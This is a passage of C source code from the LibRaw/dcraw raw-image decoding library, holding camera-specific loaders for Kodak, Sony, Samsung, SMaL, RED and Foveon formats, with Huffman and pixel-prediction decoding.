fseek (ifp, 20, SEEK_CUR);
if ((c = get4()) > 2) break;
fseek (ifp, 12, SEEK_CUR);
if ((deg = get4()) > 8) break;
for (i=0; i <= deg && i < 9; i++)
coeff[i] = getreal(12);
for (i=0; i < 256; i++) {
for (tot=j=0; j <= deg; j++)
tot += coeff[j] * pow(i/255.0, (int)j);
cur[c][i] = tot*0xffff;
}
}
order = sorder;
} else {
gamma_curve (1/2.4, 12.92, 1, 255);
FORC3 memcpy (cur[c], curve, sizeof cur[0]);
}
cinfo.err = jpeg_std_error (&jerr);
jpeg_create_decompress (&cinfo);
while (trow < raw_height) {
fseek (ifp, save+=4, SEEK_SET);
if (tile_length < INT_MAX)
fseek (ifp, get4(), SEEK_SET);
#ifdef LIBRAW_LIBRARY_BUILD
if(libraw_internal_data.internal_data.input->jpeg_src(&cinfo) == -1)
{
jpeg_destroy_decompress(&cinfo);
throw LIBRAW_EXCEPTION_DECODE_JPEG;
}
#else
jpeg_stdio_src (&cinfo, ifp);
#endif
jpeg_read_header (&cinfo, TRUE);
jpeg_start_decompress (&cinfo);
buf = (*cinfo.mem->alloc_sarray)
((j_common_ptr) &cinfo, JPOOL_IMAGE, cinfo.output_width*3, 1);
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
while (cinfo.output_scanline < cinfo.output_height &&
(row = trow + cinfo.output_scanline) < height) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
jpeg_read_scanlines (&cinfo, buf, 1);
pixel = (JSAMPLE (*)[3]) buf[0];
for (col=0; col < cinfo.output_width && tcol+col < width; col++) {
FORC3 image[row*width+tcol+col][c] = cur[c][pixel[col][c]];
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
jpeg_destroy_decompress (&cinfo);
throw;
}
#endif
jpeg_abort_decompress (&cinfo);
if ((tcol += tile_width) >= raw_width)
trow += tile_length + (tcol = 0);
}
jpeg_destroy_decompress (&cinfo);
maximum = 0xffff;
}
#endif
void CLASS kodak_dc120_load_raw()
{
static const int mul[4] = { 162, 192, 187, 92 };
static const int add[4] = { 0, 636, 424, 212 };
uchar pixel[848];
int row, shift, col;
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (fread (pixel, 1, 848, ifp) < 848) derror();
shift = row * mul[row & 3] + add[row & 3];
for (col=0; col < width; col++)
RAW(row,col) = (ushort) pixel[(col + shift) % 848];
}
maximum = 0xff;
}
void CLASS eight_bit_load_raw()
{
uchar *pixel;
unsigned row, col;
pixel = (uchar *) calloc (raw_width, sizeof *pixel);
merror (pixel, "eight_bit_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (fread (pixel, 1, raw_width, ifp) < raw_width) derror();
for (col=0; col < raw_width; col++)
RAW(row,col) = curve[pixel[col]];
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
free (pixel);
throw;
}
#endif
free (pixel);
maximum = curve[0xff];
}
void CLASS kodak_c330_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
uchar *pixel;
int row, col, y, cb, cr, rgb[3], c;
pixel = (uchar *) calloc (raw_width, 2*sizeof *pixel);
merror (pixel, "kodak_c330_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (fread (pixel, raw_width, 2, ifp) < 2) derror();
if (load_flags && (row & 31) == 31)
fseek (ifp, raw_width*32, SEEK_CUR);
for (col=0; col < width; col++) {
y = pixel[col*2];
cb = pixel[(col*2 & -4) | 1] - 128;
cr = pixel[(col*2 & -4) | 3] - 128;
rgb[1] = y - ((cb + cr + 2) >> 2);
rgb[2] = rgb[1] + cb;
rgb[0] = rgb[1] + cr;
FORC3 image[row*width+col][c] = curve[LIM(rgb[c],0,255)];
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
free (pixel);
throw;
}
#endif
free (pixel);
maximum = curve[0xff];
}
void CLASS kodak_c603_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
uchar *pixel;
int row, col, y, cb, cr, rgb[3], c;
pixel = (uchar *) calloc (raw_width, 3*sizeof *pixel);
merror (pixel, "kodak_c603_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (~row & 1)
if (fread (pixel, raw_width, 3, ifp) < 3) derror();
for (col=0; col < width; col++) {
y = pixel[width*2*(row & 1) + col];
cb = pixel[width + (col & -2)] - 128;
cr = pixel[width + (col & -2)+1] - 128;
rgb[1] = y - ((cb + cr + 2) >> 2);
rgb[2] = rgb[1] + cb;
rgb[0] = rgb[1] + cr;
FORC3 image[row*width+col][c] = curve[LIM(rgb[c],0,255)];
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
free (pixel);
throw;
}
#endif
free (pixel);
maximum = curve[0xff];
}
void CLASS kodak_262_load_raw()
{
static const uchar kodak_tree[2][26] =
{ { 0,1,5,1,1,2,0,0,0,0,0,0,0,0,0,0, 0,1,2,3,4,5,6,7,8,9 },
{ 0,3,1,1,1,1,1,2,0,0,0,0,0,0,0,0, 0,1,2,3,4,5,6,7,8,9 } };
ushort *huff[2];
uchar *pixel;
int *strip, ns, c, row, col, chess, pi=0, pi1, pi2, pred, val;
FORC(2) huff[c] = make_decoder (kodak_tree[c]);
ns = (raw_height+63) >> 5;
pixel = (uchar *) malloc (raw_width*32 + ns*4);
merror (pixel, "kodak_262_load_raw()");
strip = (int *) (pixel + raw_width*32);
order = 0x4d4d;
FORC(ns) strip[c] = get4();
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if ((row & 31) == 0) {
fseek (ifp, strip[row >> 5], SEEK_SET);
getbits(-1);
pi = 0;
}
for (col=0; col < raw_width; col++) {
chess = (row + col) & 1;
pi1 = chess ? pi-2 : pi-raw_width-1;
pi2 = chess ? pi-2*raw_width : pi-raw_width+1;
if (col <= chess) pi1 = -1;
if (pi1 < 0) pi1 = pi2;
if (pi2 < 0) pi2 = pi1;
if (pi1 < 0 && col > 1) pi1 = pi2 = pi-2;
pred = (pi1 < 0) ? 0 : (pixel[pi1] + pixel[pi2]) >> 1;
pixel[pi] = val = pred + ljpeg_diff (huff[chess]);
if (val >> 8) derror();
val = curve[pixel[pi++]];
RAW(row,col) = val;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
free (pixel);
throw;
}
#endif
free (pixel);
FORC(2) free (huff[c]);
}
int CLASS kodak_65000_decode (short *out, int bsize)
{
uchar c, blen[768];
ushort raw[6];
INT64 bitbuf=0;
int save, bits=0, i, j, len, diff;
save = ftell(ifp);
bsize = (bsize + 3) & -4;
for (i=0; i < bsize; i+=2) {
c = fgetc(ifp);
if ((blen[i ] = c & 15) > 12 ||
(blen[i+1] = c >> 4) > 12 ) {
fseek (ifp, save, SEEK_SET);
for (i=0; i < bsize; i+=8) {
read_shorts (raw, 6);
out[i ] = raw[0] >> 12 << 8 | raw[2] >> 12 << 4 | raw[4] >> 12;
out[i+1] = raw[1] >> 12 << 8 | raw[3] >> 12 << 4 | raw[5] >> 12;
for (j=0; j < 6; j++)
out[i+2+j] = raw[j] & 0xfff;
}
return 1;
}
}
if ((bsize & 7) == 4) {
bitbuf = fgetc(ifp) << 8;
bitbuf += fgetc(ifp);
bits = 16;
}
for (i=0; i < bsize; i++) {
len = blen[i];
if (bits < len) {
for (j=0; j < 32; j+=8)
bitbuf += (INT64) fgetc(ifp) << (bits+(j^8));
bits += 32;
}
diff = bitbuf & (0xffff >> (16-len));
bitbuf >>= len;
bits -= len;
if ((diff & (1 << (len-1))) == 0)
diff -= (1 << len) - 1;
out[i] = diff;
}
return 0;
}
void CLASS kodak_65000_load_raw()
{
short buf[272]; /* extra room for data stored w/o predictor */
int row, col, len, pred[2], ret, i;
for (row=0; row < height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col+=256) {
pred[0] = pred[1] = 0;
len = MIN (256, width-col);
ret = kodak_65000_decode (buf, len);
for (i=0; i < len; i++)
{
int idx = ret ? buf[i] : (pred[i & 1] += buf[i]);
if(idx >=0 && idx <= 0xffff)
{
if ((RAW(row,col+i) = curve[idx]) >> 12) derror();
}
else
derror();
}
}
}
}
void CLASS kodak_ycbcr_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
short buf[384], *bp;
int row, col, len, c, i, j, k, y[2][2], cb, cr, rgb[3];
ushort *ip;
if (!image) return;
unsigned int bits = (load_flags && load_flags > 9 && load_flags < 17)?load_flags:10;
for (row=0; row < height; row+=2)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col+=128) {
len = MIN (128, width-col);
kodak_65000_decode (buf, len*3);
y[0][1] = y[1][1] = cb = cr = 0;
for (bp=buf, i=0; i < len; i+=2, bp+=2) {
cb += bp[4];
cr += bp[5];
rgb[1] = -((cb + cr + 2) >> 2);
rgb[2] = rgb[1] + cb;
rgb[0] = rgb[1] + cr;
for (j=0; j < 2; j++)
for (k=0; k < 2; k++) {
if ((y[j][k] = y[j][k^1] + *bp++) >> bits) derror();
ip = image[(row+j)*width + col+i+k];
FORC3 ip[c] = curve[LIM(y[j][k]+rgb[c], 0, 0xfff)];
}
}
}
}
}
void CLASS kodak_rgb_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
short buf[768], *bp;
int row, col, len, c, i, rgb[3],ret;
ushort *ip=image[0];
for (row=0; row < height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col+=256) {
len = MIN (256, width-col);
ret = kodak_65000_decode (buf, len*3);
memset (rgb, 0, sizeof rgb);
for (bp=buf, i=0; i < len; i++, ip+=4)
#ifdef LIBRAW_LIBRARY_BUILD
if(load_flags == 12)
{
FORC3 ip[c] = ret ? (*bp++) : (rgb[c] += *bp++);
}
else
#endif
FORC3 if ((ip[c] = ret ? (*bp++) : (rgb[c] += *bp++)) >> 12) derror();
}
}
}
void CLASS kodak_thumb_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
int row, col;
colors = thumb_misc >> 5;
for (row=0; row < height; row++)
for (col=0; col < width; col++)
read_shorts (image[row*width+col], colors);
maximum = (1 << (thumb_misc & 31)) - 1;
}
void CLASS sony_decrypt (unsigned *data, int len, int start, int key)
{
#ifndef LIBRAW_NOTHREADS
#define pad tls->sony_decrypt.pad
#define p tls->sony_decrypt.p
#else
static unsigned pad[128], p;
#endif
if (start) {
for (p=0; p < 4; p++)
pad[p] = key = key * 48828125 + 1;
pad[3] = pad[3] << 1 | (pad[0]^pad[2]) >> 31;
for (p=4; p < 127; p++)
pad[p] = (pad[p-4]^pad[p-2]) << 1 | (pad[p-3]^pad[p-1]) >> 31;
for (p=0; p < 127; p++)
pad[p] = htonl(pad[p]);
}
while (len--)
{
*data++ ^= pad[p & 127] = pad[(p+1) & 127] ^ pad[(p+65) & 127];
p++;
}
#ifndef LIBRAW_NOTHREADS
#undef pad
#undef p
#endif
}
void CLASS sony_load_raw()
{
uchar head[40];
ushort *pixel;
unsigned i, key, row, col;
fseek (ifp, 200896, SEEK_SET);
fseek (ifp, (unsigned) fgetc(ifp)*4 - 1, SEEK_CUR);
order = 0x4d4d;
key = get4();
fseek (ifp, 164600, SEEK_SET);
fread (head, 1, 40, ifp);
sony_decrypt ((unsigned *) head, 10, 1, key);
for (i=26; i-- > 22; )
key = key << 8 | head[i];
fseek (ifp, data_offset, SEEK_SET);
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
pixel = raw_image + row*raw_width;
if (fread (pixel, 2, raw_width, ifp) < raw_width) derror();
sony_decrypt ((unsigned *) pixel, raw_width/2, !row, key);
for (col=0; col < raw_width; col++)
if ((pixel[col] = ntohs(pixel[col])) >> 14) derror();
}
maximum = 0x3ff0;
}
void CLASS sony_arw_load_raw()
{
ushort huff[32770];
static const ushort tab[18] =
{ 0xf11,0xf10,0xe0f,0xd0e,0xc0d,0xb0c,0xa0b,0x90a,0x809,
0x708,0x607,0x506,0x405,0x304,0x303,0x300,0x202,0x201 };
int i, c, n, col, row, sum=0;
huff[0] = 15;
for (n=i=0; i < 18; i++)
FORC(32768 >> (tab[i] >> 8)) huff[++n] = tab[i];
getbits(-1);
for (col = raw_width; col--; )
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (row=0; row < raw_height+1; row+=2) {
if (row == raw_height) row = 1;
if ((sum += ljpeg_diff(huff)) >> 12) derror();
if (row < height) RAW(row,col) = sum;
}
}
}
void CLASS sony_arw2_load_raw()
{
uchar *data, *dp;
ushort pix[16];
int row, col, val, max, min, imax, imin, sh, bit, i;
data = (uchar *) malloc (raw_width+1);
merror (data, "sony_arw2_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
fread (data, 1, raw_width, ifp);
for (dp=data, col=0; col < raw_width-30; dp+=16) {
max = 0x7ff & (val = sget4(dp));
min = 0x7ff & val >> 11;
imax = 0x0f & val >> 22;
imin = 0x0f & val >> 26;
for (sh=0; sh < 4 && 0x80 << sh <= max-min; sh++);
#ifdef LIBRAW_LIBRARY_BUILD
/* flag checks if outside of loop */
if(! (imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_ALLFLAGS) // no flag set
|| (imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_DELTATOVALUE)
)
{
for (bit=30, i=0; i < 16; i++)
if (i == imax) pix[i] = max;
else if (i == imin) pix[i] = min;
else {
pix[i] = ((sget2(dp+(bit >> 3)) >> (bit & 7) & 0x7f) << sh) + min;
if (pix[i] > 0x7ff) pix[i] = 0x7ff;
bit += 7;
}
}
else if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_BASEONLY)
{
for (bit=30, i=0; i < 16; i++)
if (i == imax) pix[i] = max;
else if (i == imin) pix[i] = min;
else pix[i]=0;
}
else if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_DELTAONLY)
{
for (bit=30, i=0; i < 16; i++)
if (i == imax) pix[i] = 0;
else if (i == imin) pix[i] = 0;
else {
pix[i] = ((sget2(dp+(bit >> 3)) >> (bit & 7) & 0x7f) << sh) + min;
if (pix[i] > 0x7ff) pix[i] = 0x7ff;
bit += 7;
}
}
else if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_DELTAZEROBASE)
{
for (bit=30, i=0; i < 16; i++)
if (i == imax) pix[i] = 0;
else if (i == imin) pix[i] = 0;
else {
pix[i] = ((sget2(dp+(bit >> 3)) >> (bit & 7) & 0x7f) << sh);
if (pix[i] > 0x7ff) pix[i] = 0x7ff;
bit += 7;
}
}
#else
/* unaltered dcraw processing */
for (bit=30, i=0; i < 16; i++)
if (i == imax) pix[i] = max;
else if (i == imin) pix[i] = min;
else {
pix[i] = ((sget2(dp+(bit >> 3)) >> (bit & 7) & 0x7f) << sh) + min;
if (pix[i] > 0x7ff) pix[i] = 0x7ff;
bit += 7;
}
#endif
#ifdef LIBRAW_LIBRARY_BUILD
if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_DELTATOVALUE)
{
for (i=0; i < 16; i++, col+=2)
{
unsigned slope = pix[i] < 1001? 2 : curve[pix[i]<<1]-curve[(pix[i]<<1)-2];
unsigned step = 1 << sh;
RAW(row,col)=curve[pix[i]<<1]>black+imgdata.params.sony_arw2_posterization_thr?
LIM(((slope*step*1000)/(curve[pix[i]<<1]-black)),0,10000):0;
}
}
else
{
for (i=0; i < 16; i++, col+=2)
RAW(row,col) = curve[pix[i] << 1];
}
#else
for (i=0; i < 16; i++, col+=2)
RAW(row,col) = curve[pix[i] << 1] >> 2;
#endif
col -= col & 1 ? 1:31;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch(...) {
free (data);
throw;
}
if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SONYARW2_DELTATOVALUE)
maximum=10000;
#endif
free (data);
}
void CLASS samsung_load_raw()
{
int row, col, c, i, dir, op[4], len[4];
#ifdef LIBRAW_LIBRARY_BUILD
if(raw_width> 32768 || raw_height > 32768) // definitely too much for old samsung
throw LIBRAW_EXCEPTION_IO_BADFILE;
#endif
unsigned maxpixels = raw_width*(raw_height+7);
order = 0x4949;
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
fseek (ifp, strip_offset+row*4, SEEK_SET);
fseek (ifp, data_offset+get4(), SEEK_SET);
ph1_bits(-1);
FORC4 len[c] = row < 2 ? 7:4;
for (col=0; col < raw_width; col+=16) {
dir = ph1_bits(1);
FORC4 op[c] = ph1_bits(2);
FORC4 switch (op[c]) {
case 3: len[c] = ph1_bits(4); break;
case 2: len[c]--; break;
case 1: len[c]++;
}
for (c = 0; c < 16; c += 2)
{
i = len[((c & 1) << 1) | (c >> 3)];
unsigned idest = RAWINDEX(row, col + c);
unsigned isrc = (dir ? RAWINDEX(row + (~c | -2), col + c) : col ? RAWINDEX(row, col + (c | -2)) : 0);
if(idest < maxpixels && isrc < maxpixels) // less than zero is handled by unsigned conversion
RAW(row, col + c) = ((signed)ph1_bits(i) << (32 - i) >> (32 - i)) + (dir ? RAW(row + (~c | -2), col + c) : col ? RAW(row, col + (c | -2)) : 128);
else
derror();
if (c == 14)
c = -1;
}
}
}
for (row=0; row < raw_height-1; row+=2)
for (col=0; col < raw_width-1; col+=2)
SWAP (RAW(row,col+1), RAW(row+1,col));
}
void CLASS samsung2_load_raw()
{
static const ushort tab[14] =
{ 0x304,0x307,0x206,0x205,0x403,0x600,0x709,
0x80a,0x90b,0xa0c,0xa0d,0x501,0x408,0x402 };
ushort huff[1026], vpred[2][2] = {{0,0},{0,0}}, hpred[2];
int i, c, n, row, col, diff;
huff[0] = 10;
for (n=i=0; i < 14; i++)
FORC(1024 >> (tab[i] >> 8)) huff[++n] = tab[i];
getbits(-1);
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++) {
diff = ljpeg_diff (huff);
if (col < 2) hpred[col] = vpred[row & 1][col] += diff;
else hpred[col & 1] += diff;
RAW(row,col) = hpred[col & 1];
if (hpred[col & 1] >> tiff_bps) derror();
}
}
}
void CLASS samsung3_load_raw()
{
int opt, init, mag, pmode, row, tab, col, pred, diff, i, c;
ushort lent[3][2], len[4], *prow[2];
order = 0x4949;
fseek (ifp, 9, SEEK_CUR);
opt = fgetc(ifp);
init = (get2(),get2());
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
fseek (ifp, (data_offset-ftell(ifp)) & 15, SEEK_CUR);
ph1_bits(-1);
mag = 0; pmode = 7;
FORC(6) ((ushort *)lent)[c] = row < 2 ? 7:4;
prow[ row & 1] = &RAW(row-1,1-((row & 1) << 1)); // green
prow[~row & 1] = &RAW(row-2,0); // red and blue
for (tab=0; tab+15 < raw_width; tab+=16) {
if (~opt & 4 && !(tab & 63)) {
i = ph1_bits(2);
mag = i < 3 ? mag-'2'+"204"[i] : ph1_bits(12);
}
if (opt & 2)
pmode = 7 - 4*ph1_bits(1);
else if (!ph1_bits(1))
pmode = ph1_bits(3);
if (opt & 1 || !ph1_bits(1)) {
FORC4 len[c] = ph1_bits(2);
FORC4 {
i = ((row & 1) << 1 | (c & 1)) % 3;
len[c] = len[c] < 3 ? lent[i][0]-'1'+"120"[len[c]] : ph1_bits(4);
lent[i][0] = lent[i][1];
lent[i][1] = len[c];
}
}
FORC(16) {
col = tab + (((c & 7) << 1)^(c >> 3)^(row & 1));
pred = (pmode == 7 || row < 2)
? (tab ? RAW(row,tab-2+(col & 1)) : init)
: (prow[col & 1][col-'4'+"0224468"[pmode]] +
prow[col & 1][col-'4'+"0244668"[pmode]] + 1) >> 1;
diff = ph1_bits (i = len[c >> 2]);
if (diff >> (i-1)) diff -= 1 << i;
diff = diff * (mag*2+1) + mag;
RAW(row,col) = pred + diff;
}
}
}
}
#define HOLE(row) ((holes >> (((row) - raw_height) & 7)) & 1)
/* Kudos to Rich Taylor for figuring out SMaL's compression algorithm. */
void CLASS smal_decode_segment (unsigned seg[2][2], int holes)
{
uchar hist[3][13] = {
{ 7, 7, 0, 0, 63, 55, 47, 39, 31, 23, 15, 7, 0 },
{ 7, 7, 0, 0, 63, 55, 47, 39, 31, 23, 15, 7, 0 },
{ 3, 3, 0, 0, 63, 47, 31, 15, 0 } };
int low, high=0xff, carry=0, nbits=8;
int pix, s, count, bin, next, i, sym[3];
uchar diff, pred[]={0,0};
ushort data=0, range=0;
fseek (ifp, seg[0][1]+1, SEEK_SET);
getbits(-1);
if (seg[1][0] > raw_width*raw_height)
seg[1][0] = raw_width*raw_height;
for (pix=seg[0][0]; pix < seg[1][0]; pix++) {
for (s=0; s < 3; s++) {
data = data << nbits | getbits(nbits);
if (carry < 0)
carry = (nbits += carry+1) < 1 ? nbits-1 : 0;
while (--nbits >= 0)
if ((data >> nbits & 0xff) == 0xff) break;
if (nbits > 0)
data = ((data & ((1 << (nbits-1)) - 1)) << 1) |
((data + (((data & (1 << (nbits-1)))) << 1)) & ((~0u) << nbits));
if (nbits >= 0) {
data += getbits(1);
carry = nbits - 8;
}
count = ((((data-range+1) & 0xffff) << 2) - 1) / (high >> 4);
for (bin=0; hist[s][bin+5] > count; bin++);
low = hist[s][bin+5] * (high >> 4) >> 2;
if (bin) high = hist[s][bin+4] * (high >> 4) >> 2;
high -= low;
for (nbits=0; high << nbits < 128; nbits++);
range = (range+low) << nbits;
high <<= nbits;
next = hist[s][1];
if (++hist[s][2] > hist[s][3]) {
next = (next+1) & hist[s][0];
hist[s][3] = (hist[s][next+4] - hist[s][next+5]) >> 2;
hist[s][2] = 1;
}
if (hist[s][hist[s][1]+4] - hist[s][hist[s][1]+5] > 1) {
if (bin < hist[s][1])
for (i=bin; i < hist[s][1]; i++) hist[s][i+5]--;
else if (next <= bin)
for (i=hist[s][1]; i < bin; i++) hist[s][i+5]++;
}
hist[s][1] = next;
sym[s] = bin;
}
diff = sym[2] << 5 | sym[1] << 2 | (sym[0] & 3);
if (sym[0] & 4)
diff = diff ? -diff : 0x80;
if (ftell(ifp) + 12 >= seg[1][1])
diff = 0;
#ifdef LIBRAW_LIBRARY_BUILD
if(pix>=raw_width*raw_height)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
raw_image[pix] = pred[pix & 1] += diff;
if (!(pix & 1) && HOLE(pix / raw_width)) pix += 2;
}
maximum = 0xff;
}
void CLASS smal_v6_load_raw()
{
unsigned seg[2][2];
fseek (ifp, 16, SEEK_SET);
seg[0][0] = 0;
seg[0][1] = get2();
seg[1][0] = raw_width * raw_height;
seg[1][1] = INT_MAX;
smal_decode_segment (seg, 0);
}
int CLASS median4 (int *p)
{
int min, max, sum, i;
min = max = sum = p[0];
for (i=1; i < 4; i++) {
sum += p[i];
if (min > p[i]) min = p[i];
if (max < p[i]) max = p[i];
}
return (sum - min - max) >> 1;
}
void CLASS fill_holes (int holes)
{
int row, col, val[4];
for (row=2; row < height-2; row++) {
if (!HOLE(row)) continue;
for (col=1; col < width-1; col+=4) {
val[0] = RAW(row-1,col-1);
val[1] = RAW(row-1,col+1);
val[2] = RAW(row+1,col-1);
val[3] = RAW(row+1,col+1);
RAW(row,col) = median4(val);
}
for (col=2; col < width-2; col+=4)
if (HOLE(row-2) || HOLE(row+2))
RAW(row,col) = (RAW(row,col-2) + RAW(row,col+2)) >> 1;
else {
val[0] = RAW(row,col-2);
val[1] = RAW(row,col+2);
val[2] = RAW(row-2,col);
val[3] = RAW(row+2,col);
RAW(row,col) = median4(val);
}
}
}
void CLASS smal_v9_load_raw()
{
unsigned seg[256][2], offset, nseg, holes, i;
fseek (ifp, 67, SEEK_SET);
offset = get4();
nseg = (uchar) fgetc(ifp);
fseek (ifp, offset, SEEK_SET);
for (i=0; i < nseg*2; i++)
((unsigned *)seg)[i] = get4() + data_offset*(i & 1);
fseek (ifp, 78, SEEK_SET);
holes = fgetc(ifp);
fseek (ifp, 88, SEEK_SET);
seg[nseg][0] = raw_height * raw_width;
seg[nseg][1] = get4() + data_offset;
for (i=0; i < nseg; i++)
smal_decode_segment (seg+i, holes);
if (holes) fill_holes (holes);
}
void CLASS redcine_load_raw()
{
#ifndef NO_JASPER
int c, row, col;
jas_stream_t *in;
jas_image_t *jimg;
jas_matrix_t *jmat;
jas_seqent_t *data;
ushort *img, *pix;
jas_init();
#ifndef LIBRAW_LIBRARY_BUILD
in = jas_stream_fopen (ifname, "rb");
#else
in = (jas_stream_t*)ifp->make_jas_stream();
if(!in)
throw LIBRAW_EXCEPTION_DECODE_JPEG2000;
#endif
jas_stream_seek (in, data_offset+20, SEEK_SET);
jimg = jas_image_decode (in, -1, 0);
#ifndef LIBRAW_LIBRARY_BUILD
if (!jimg) longjmp (failure, 3);
#else
if(!jimg)
{
jas_stream_close (in);
throw LIBRAW_EXCEPTION_DECODE_JPEG2000;
}
#endif
jmat = jas_matrix_create (height/2, width/2);
merror (jmat, "redcine_load_raw()");
img = (ushort *) calloc ((height+2), (width+2)*2);
merror (img, "redcine_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
bool fastexitflag = false;
try {
#endif
FORC4 {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
jas_image_readcmpt (jimg, c, 0, 0, width/2, height/2, jmat);
data = jas_matrix_getref (jmat, 0, 0);
for (row = c >> 1; row < height; row+=2)
for (col = c & 1; col < width; col+=2)
img[(row+1)*(width+2)+col+1] = data[(row/2)*(width/2)+col/2];
}
for (col=1; col <= width; col++) {
img[col] = img[2*(width+2)+col];
img[(height+1)*(width+2)+col] = img[(height-1)*(width+2)+col];
}
for (row=0; row < height+2; row++) {
img[row*(width+2)] = img[row*(width+2)+2];
img[(row+1)*(width+2)-1] = img[(row+1)*(width+2)-3];
}
for (row=1; row <= height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
pix = img + row*(width+2) + (col = 1 + (FC(row,1) & 1));
for ( ; col <= width; col+=2, pix+=2) {
c = (((pix[0] - 0x800) << 3) +
pix[-(width+2)] + pix[width+2] + pix[-1] + pix[1]) >> 2;
pix[0] = LIM(c,0,4095);
}
}
for (row=0; row < height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < width; col++)
RAW(row,col) = curve[img[(row+1)*(width+2)+col+1]];
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
fastexitflag=true;
}
#endif
free (img);
jas_matrix_destroy (jmat);
jas_image_destroy (jimg);
jas_stream_close (in);
#ifdef LIBRAW_LIBRARY_BUILD
if(fastexitflag)
throw LIBRAW_EXCEPTION_CANCELLED_BY_CALLBACK;
#endif
#endif
}
//@end COMMON
/* RESTRICTED code starts here */
void CLASS foveon_decoder (unsigned size, unsigned code)
{
static unsigned huff[1024];
struct decode *cur;
int i, len;
if (!code) {
for (i=0; i < size; i++)
huff[i] = get4();
memset (first_decode, 0, sizeof first_decode);
free_decode = first_decode;
}
cur = free_decode++;
if (free_decode > first_decode+2048) {
fprintf (stderr,_("%s: decoder table overflow\n"), ifname);
longjmp (failure, 2);
}
if (code)
for (i=0; i < size; i++)
if (huff[i] == code) {
cur->leaf = i;
return;
}
if ((len = code >> 27) > 26) return;
code = (len+1) << 27 | (code & 0x3ffffff) << 1;
cur->branch[0] = free_decode;
foveon_decoder (size, code);
cur->branch[1] = free_decode;
foveon_decoder (size, code+1);
}
void CLASS foveon_thumb()
{
unsigned bwide, row, col, bitbuf=0, bit=1, c, i;
char *buf;
struct decode *dindex;
short pred[3];
bwide = get4();
fprintf (ofp, "P6\n%d %d\n255\n", thumb_width, thumb_height);
if (bwide > 0) {
if (bwide < thumb_width*3) return;
buf = (char *) malloc (bwide);
merror (buf, "foveon_thumb()");
for (row=0; row < thumb_height; row++) {
fread (buf, 1, bwide, ifp);
fwrite (buf, 3, thumb_width, ofp);
}
free (buf);
return;
}
foveon_decoder (256, 0);
for (row=0; row < thumb_height; row++) {
memset (pred, 0, sizeof pred);
if (!bit) get4();
for (bit=col=0; col < thumb_width; col++)
FORC3 {
for (dindex=first_decode; dindex->branch[0]; ) {
if ((bit = (bit-1) & 31) == 31)
for (i=0; i < 4; i++)
bitbuf = (bitbuf << 8) + fgetc(ifp);
dindex = dindex->branch[bitbuf >> bit & 1];
}
pred[c] += dindex->leaf;
fputc (pred[c], ofp);
}
}
}
void CLASS foveon_sd_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
struct decode *dindex;
short diff[1024];
unsigned bitbuf=0;
int pred[3], row, col, bit=-1, c, i;
